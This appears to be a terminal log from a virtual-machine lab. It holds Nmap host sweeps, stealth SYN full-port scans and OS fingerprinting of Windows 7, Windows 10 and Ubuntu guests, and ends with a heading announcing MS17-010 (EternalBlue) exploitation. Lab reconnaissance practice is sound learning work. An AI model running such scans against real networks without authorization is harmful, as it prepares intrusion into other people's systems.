Nmap scan report for 10.211.55.75Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.75 are filtered
Nmap scan report for 10.211.55.76Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.76 are filtered
Nmap scan report for 10.211.55.77Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.77 are filtered
Nmap scan report for 10.211.55.78Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.78 are filtered
Nmap scan report for 10.211.55.79Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.79 are filtered
Nmap scan report for 10.211.55.80Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.80 are filtered
Nmap scan report for 10.211.55.81Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.81 are filtered
Nmap scan report for 10.211.55.82Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.82 are filtered
Nmap scan report for 10.211.55.83Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.83 are filtered
Nmap scan report for 10.211.55.84Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.84 are filtered
Nmap scan report for 10.211.55.85Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.85 are filtered
Nmap scan report for 10.211.55.86Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.86 are filtered
Nmap scan report for 10.211.55.87Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.87 are filtered
Nmap scan report for 10.211.55.88Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.88 are filtered
Nmap scan report for 10.211.55.89Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.89 are filtered
Nmap scan report for 10.211.55.90Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.90 are filtered
Nmap scan report for 10.211.55.91Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.91 are filtered
Nmap scan report for 10.211.55.92Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.92 are filtered
Nmap scan report for 10.211.55.93Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.93 are filtered
Nmap scan report for 10.211.55.94Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.94 are filtered
Nmap scan report for 10.211.55.95Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.95 are filtered
Nmap scan report for 10.211.55.96Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.96 are filtered
Nmap scan report for 10.211.55.97Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.97 are filtered
Nmap scan report for 10.211.55.98Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.98 are filtered
Nmap scan report for 10.211.55.99Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.99 are filtered
Nmap scan report for 10.211.55.100Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.100 are filtered
Nmap scan report for 10.211.55.101Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.101 are filtered
Nmap scan report for 10.211.55.102Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.102 are filtered
Nmap scan report for 10.211.55.103Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.103 are filtered
Nmap scan report for 10.211.55.104Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.104 are filtered
Nmap scan report for 10.211.55.105Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.105 are filtered
Nmap scan report for 10.211.55.106Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.106 are filtered
Nmap scan report for 10.211.55.107Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.107 are filtered
Nmap scan report for 10.211.55.108Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.108 are filtered
Nmap scan report for 10.211.55.109Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.109 are filtered
Nmap scan report for 10.211.55.110Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.110 are filtered
Nmap scan report for 10.211.55.111Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.111 are filtered
Nmap scan report for 10.211.55.112Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.112 are filtered
Nmap scan report for 10.211.55.113Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.113 are filtered
Nmap scan report for 10.211.55.114Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.114 are filtered
Nmap scan report for 10.211.55.115Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.115 are filtered
Nmap scan report for 10.211.55.116Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.116 are filtered
Nmap scan report for 10.211.55.117Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.117 are filtered
Nmap scan report for 10.211.55.118Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.118 are filtered
Nmap scan report for 10.211.55.119Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.119 are filtered
Nmap scan report for 10.211.55.120Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.120 are filtered
Nmap scan report for 10.211.55.121Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.121 are filtered
Nmap scan report for 10.211.55.122Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.122 are filtered
Nmap scan report for 10.211.55.123Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.123 are filtered
Nmap scan report for 10.211.55.124Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.124 are filtered
Nmap scan report for 10.211.55.125Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.125 are filtered
Nmap scan report for 10.211.55.126Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.126 are filtered
Nmap scan report for 10.211.55.127Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.127 are filtered
Nmap scan report for 10.211.55.128Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.128 are filtered
Nmap scan report for 10.211.55.129Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.129 are filtered
Nmap scan report for 10.211.55.130Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.130 are filtered
Nmap scan report for 10.211.55.131Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.131 are filtered
Nmap scan report for 10.211.55.132Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.132 are filtered
Nmap scan report for 10.211.55.133Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.133 are filtered
Nmap scan report for 10.211.55.134Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.134 are filtered
Nmap scan report for 10.211.55.135Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.135 are filtered
Nmap scan report for 10.211.55.136Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.136 are filtered
Nmap scan report for 10.211.55.137Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.137 are filtered
Nmap scan report for 10.211.55.138Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.138 are filtered
Nmap scan report for 10.211.55.139Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.139 are filtered
Nmap scan report for 10.211.55.140Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.140 are filtered
Nmap scan report for 10.211.55.141Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.141 are filtered
Nmap scan report for 10.211.55.142Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.142 are filtered
Nmap scan report for 10.211.55.143Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.143 are filtered
Nmap scan report for 10.211.55.144Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.144 are filtered
Nmap scan report for 10.211.55.145Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.145 are filtered
Nmap scan report for 10.211.55.146Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.146 are filtered
Nmap scan report for 10.211.55.147Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.147 are filtered
Nmap scan report for 10.211.55.148Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.148 are filtered
Nmap scan report for 10.211.55.149Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.149 are filtered
Nmap scan report for 10.211.55.150Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.150 are filtered
Nmap scan report for 10.211.55.151Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.151 are filtered
Nmap scan report for 10.211.55.152Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.152 are filtered
Nmap scan report for 10.211.55.153Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.153 are filtered
Nmap scan report for 10.211.55.154Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.154 are filtered
Nmap scan report for 10.211.55.155Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.155 are filtered
Nmap scan report for 10.211.55.156Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.156 are filtered
Nmap scan report for 10.211.55.157Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.157 are filtered
Nmap scan report for 10.211.55.158Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.158 are filtered
Nmap scan report for 10.211.55.159Host is up (0.000029s latency).All 1000 scanned ports on 10.211.55.159 are filtered
Nmap scan report for 10.211.55.160Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.160 are filtered
Nmap scan report for 10.211.55.161Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.161 are filtered
Nmap scan report for 10.211.55.162Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.162 are filtered
Nmap scan report for 10.211.55.163Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.163 are filtered
Nmap scan report for 10.211.55.164Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.164 are filtered
Nmap scan report for 10.211.55.165Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.165 are filtered
Nmap scan report for 10.211.55.166Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.166 are filtered
Nmap scan report for 10.211.55.167Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.167 are filtered
Nmap scan report for 10.211.55.168Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.168 are filtered
Nmap scan report for 10.211.55.169Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.169 are filtered
Nmap scan report for 10.211.55.170Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.170 are filtered
Nmap scan report for 10.211.55.171Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.171 are filtered
Nmap scan report for 10.211.55.172Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.172 are filtered
Nmap scan report for 10.211.55.173Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.173 are filtered
Nmap scan report for 10.211.55.174Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.174 are filtered
Nmap scan report for 10.211.55.175Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.175 are filtered
Nmap scan report for 10.211.55.176Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.176 are filtered
Nmap scan report for 10.211.55.177Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.177 are filtered
Nmap scan report for 10.211.55.178Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.178 are filtered
Nmap scan report for 10.211.55.179Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.179 are filtered
Nmap scan report for 10.211.55.180Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.180 are filtered
Nmap scan report for 10.211.55.181Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.181 are filtered
Nmap scan report for 10.211.55.182Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.182 are filtered
Nmap scan report for 10.211.55.183Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.183 are filtered
Nmap scan report for 10.211.55.184Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.184 are filtered
Nmap scan report for 10.211.55.185Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.185 are filtered
Nmap scan report for 10.211.55.186Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.186 are filtered
Nmap scan report for 10.211.55.187Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.187 are filtered
Nmap scan report for 10.211.55.188Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.188 are filtered
Nmap scan report for 10.211.55.189Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.189 are filtered
Nmap scan report for 10.211.55.190Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.190 are filtered
Nmap scan report for 10.211.55.191Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.191 are filtered
Nmap scan report for 10.211.55.192Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.192 are filtered
Nmap scan report for 10.211.55.193Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.193 are filtered
Nmap scan report for 10.211.55.194Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.194 are filtered
Nmap scan report for 10.211.55.195Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.195 are filtered
Nmap scan report for 10.211.55.196Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.196 are filtered
Nmap scan report for 10.211.55.197Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.197 are filtered
Nmap scan report for 10.211.55.198Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.198 are filtered
Nmap scan report for 10.211.55.199Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.199 are filtered
Nmap scan report for 10.211.55.200Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.200 are filtered
Nmap scan report for 10.211.55.201Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.201 are filtered
Nmap scan report for 10.211.55.202Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.202 are filtered
Nmap scan report for 10.211.55.203Host is up (0.00063s latency).All 1000 scanned ports on 10.211.55.203 are filtered
Nmap scan report for 10.211.55.204Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.204 are filtered
Nmap scan report for 10.211.55.205Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.205 are filtered
Nmap scan report for 10.211.55.206Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.206 are filtered
Nmap scan report for 10.211.55.207Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.207 are filtered
Nmap scan report for 10.211.55.208Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.208 are filtered
Nmap scan report for 10.211.55.209Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.209 are filtered
Nmap scan report for 10.211.55.210Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.210 are filtered
Nmap scan report for 10.211.55.211Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.211 are filtered
Nmap scan report for 10.211.55.212Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.212 are filtered
Nmap scan report for 10.211.55.213Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.213 are filtered
Nmap scan report for 10.211.55.214Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.214 are filtered
Nmap scan report for 10.211.55.215Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.215 are filtered
Nmap scan report for 10.211.55.216Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.216 are filtered
Nmap scan report for 10.211.55.217Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.217 are filtered
Nmap scan report for 10.211.55.218Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.218 are filtered
Nmap scan report for 10.211.55.219Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.219 are filtered
Nmap scan report for 10.211.55.220Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.220 are filtered
Nmap scan report for 10.211.55.221Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.221 are filtered
Nmap scan report for 10.211.55.222Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.222 are filtered
Nmap scan report for 10.211.55.223Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.223 are filtered
Nmap scan report for 10.211.55.224Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.224 are filtered
Nmap scan report for 10.211.55.225Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.225 are filtered
Nmap scan report for 10.211.55.226Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.226 are filtered
Nmap scan report for 10.211.55.227Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.227 are filtered
Nmap scan report for 10.211.55.228Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.228 are filtered
Nmap scan report for 10.211.55.229Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.229 are filtered
Nmap scan report for 10.211.55.230Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.230 are filtered
Nmap scan report for 10.211.55.231Host is up (0.000028s latency).All 1000 scanned ports on 10.211.55.231 are filtered
Nmap scan report for 10.211.55.232Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.232 are filtered
Nmap scan report for 10.211.55.233Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.233 are filtered
Nmap scan report for 10.211.55.234Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.234 are filtered
Nmap scan report for 10.211.55.235Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.235 are filtered
Nmap scan report for 10.211.55.236Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.236 are filtered
Nmap scan report for 10.211.55.237Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.237 are filtered
Nmap scan report for 10.211.55.238Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.238 are filtered
Nmap scan report for 10.211.55.239Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.239 are filtered
Nmap scan report for 10.211.55.240Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.240 are filtered
Nmap scan report for 10.211.55.241Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.241 are filtered
Nmap scan report for 10.211.55.242Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.242 are filtered
Nmap scan report for 10.211.55.243Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.243 are filtered
Nmap scan report for 10.211.55.244Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.244 are filtered
Nmap scan report for 10.211.55.245Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.245 are filtered
Nmap scan report for 10.211.55.246Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.246 are filtered
Nmap scan report for 10.211.55.247Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.247 are filtered
Nmap scan report for 10.211.55.248Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.248 are filtered
Nmap scan report for 10.211.55.249Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.249 are filtered
Nmap scan report for 10.211.55.250Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.250 are filtered
Nmap scan report for 10.211.55.251Host is up (0.000032s latency).All 1000 scanned ports on 10.211.55.251 are filtered
Nmap scan report for 10.211.55.252Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.252 are filtered
Nmap scan report for 10.211.55.253Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.253 are filtered
Nmap scan report for 10.211.55.254Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.254 are filtered
Nmap scan report for 10.211.55.255Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.255 are filtered
Nmap done: 256 IP addresses (256 hosts up) scanned in 127.90 seconds(base) ➜ ~ (base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.5Password:Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:37 CSTInitiating ARP Ping Scan at 19:37Scanning 10.211.55.5 [1 port]Completed ARP Ping Scan at 19:37, 0.00s elapsed (1 total hosts)Initiating SYN Stealth Scan at 19:37Scanning windows-10.shared (10.211.55.5) [65535 ports]Discovered open port 135/tcp on 10.211.55.5Discovered open port 139/tcp on 10.211.55.5Discovered open port 445/tcp on 10.211.55.5Discovered open port 49664/tcp on 10.211.55.5Discovered open port 49669/tcp on 10.211.55.5Discovered open port 5040/tcp on 10.211.55.5Discovered open port 49667/tcp on 10.211.55.5Discovered open port 49668/tcp on 10.211.55.5Discovered open port 49665/tcp on 10.211.55.5Discovered open port 49671/tcp on 10.211.55.5Discovered open port 49666/tcp on 10.211.55.5Completed SYN Stealth Scan at 19:37, 41.72s elapsed (65535 total ports)Nmap scan report for windows-10.shared (10.211.55.5)Host is up (0.00018s latency).Not shown: 65524 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds5040/tcp open unknown49664/tcp open unknown49665/tcp open unknown49666/tcp open unknown49667/tcp open unknown49668/tcp open unknown49669/tcp open unknown49671/tcp open unknownMAC Address: 00:1C:42:F4:4F:FE (Parallels)
Read data files from: /usr/local/bin/../share/nmapNmap done: 1 IP address (1 host up) scanned in 41.79 seconds Raw packets sent: 69291 (3.049MB) | Rcvd: 65536 (2.621MB)(base) ➜ ~ nmap -O 10.211.55.5TCP/IP fingerprinting (for OS scan) requires root privileges.QUITTING!(base) ➜ ~ nmap -Pn -O 10.211.55.5TCP/IP fingerprinting (for OS scan) requires root privileges.QUITTING!(base) ➜ ~ sudo nmap -O 10.211.55.5Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:40 CSTNmap scan report for windows-10.shared (10.211.55.5)Host is up (0.00022s latency).Not shown: 997 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-dsMAC Address: 00:1C:42:F4:4F:FE (Parallels)Device type: general purposeRunning (JUST GUESSING): Microsoft Windows Longhorn|10|2008|7|Vista|8.1 (94%)OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_10:1703 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_8.1Aggressive OS guesses: Microsoft Windows Longhorn (94%), Microsoft Windows 10 1703 (92%), Microsoft Windows 10 1511 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 SP2 (91%), Microsoft Windows 7 SP1 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows 8 (91%), Microsoft Windows 10 1607 (91%), Microsoft Windows Vista SP1 (90%)No exact OS matches for host (test conditions non-ideal).Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 5.43 seconds(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.6Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:41 CSTInitiating ARP Ping Scan at 19:41Scanning 10.211.55.6 [1 port]Completed ARP Ping Scan at 19:41, 0.00s elapsed (1 total hosts)Initiating SYN Stealth Scan at 19:41Scanning ubuntu-linux20.04.shared (10.211.55.6) [65535 ports]Discovered open port 22/tcp on 10.211.55.6Discovered open port 61616/tcp on 10.211.55.6Discovered open port 8161/tcp on 10.211.55.6Discovered open port 8088/tcp on 10.211.55.6Completed SYN Stealth Scan at 19:41, 0.55s elapsed (65535 total ports)Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)Host is up (0.000046s latency).Not shown: 65531 closed portsPORT STATE SERVICE22/tcp open ssh8088/tcp open radan-http8161/tcp open patrol-snmp61616/tcp open unknownMAC Address: 00:1C:42:B7:60:2B (Parallels)
Read data files from: /usr/local/bin/../share/nmapNmap done: 1 IP address (1 host up) scanned in 0.61 seconds Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)(base) ➜ ~ sudo nmap -O 10.211.55.6 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:42 CSTNmap scan report for ubuntu-linux20.04.shared (10.211.55.6)Host is up (0.00019s latency).Not shown: 998 closed portsPORT STATE SERVICE22/tcp open ssh8088/tcp open radan-httpMAC Address: 00:1C:42:B7:60:2B (Parallels)No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.80%E=4%D=8/8%OT=22%CT=1%CU=37942%PV=Y%DS=1%DC=D%G=Y%M=001C42%TMOS:=5F2E8FA2%P=x86_64-apple-darwin19.0.0)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=ZOS:%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11OS:NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FEOS:88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=4OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%OOS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%QOS:=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=YOS:%DFI=N%T=40%CD=S)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.8Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:43 CSTInitiating ARP Ping Scan at 19:43Scanning 10.211.55.8 [1 port]Completed ARP Ping Scan at 19:43, 0.00s elapsed (1 total hosts)Initiating SYN Stealth Scan at 19:43Scanning windows-7sp1.shared (10.211.55.8) [65535 ports]Discovered open port 445/tcp on 10.211.55.8Discovered open port 135/tcp on 10.211.55.8Discovered open port 139/tcp on 10.211.55.8Discovered open port 49157/tcp on 10.211.55.8Discovered open port 49156/tcp on 10.211.55.8Discovered open port 49153/tcp on 10.211.55.8Discovered open port 49155/tcp on 10.211.55.8Discovered open port 49154/tcp on 10.211.55.8Discovered open port 49152/tcp on 10.211.55.8Completed SYN Stealth Scan at 19:44, 40.56s elapsed (65535 total ports)Nmap scan report for windows-7sp1.shared (10.211.55.8)Host is up (0.00010s latency).Not shown: 65526 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknownMAC Address: 00:1C:42:B2:9C:23 (Parallels)
Read data files from: /usr/local/bin/../share/nmapNmap done: 1 IP address (1 host up) scanned in 40.63 seconds Raw packets sent: 69424 (3.055MB) | Rcvd: 65537 (2.622MB)(base) ➜ ~ sudo nmap -O 10.211.55.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:44 CSTNmap scan report for windows-7sp1.shared (10.211.55.8)Host is up (0.00017s latency).Not shown: 991 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknownMAC Address: 00:1C:42:B2:9C:23 (Parallels)Device type: general purposeRunning: Microsoft Windows 7|2008|8.1OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 2.78 seconds(base) ➜ ~ nmap -O 10.211.55.8TCP/IP fingerprinting (for OS scan) requires root privileges.QUITTING!(base) ➜ ~ sudo nmap -O 10.211.55.8Password:Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 20:13 CSTNmap scan report for windows-7sp1.shared (10.211.55.8)Host is up (0.00018s latency).Not shown: 990 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds3389/tcp open ms-wbt-server49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknownMAC Address: 00:1C:42:B2:9C:23 (Parallels)Device type: general purposeRunning: Microsoft Windows 7|2008|8.1OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 2.91 seconds(base) ➜ ~ 

漏洞利用-Windows MS17-010

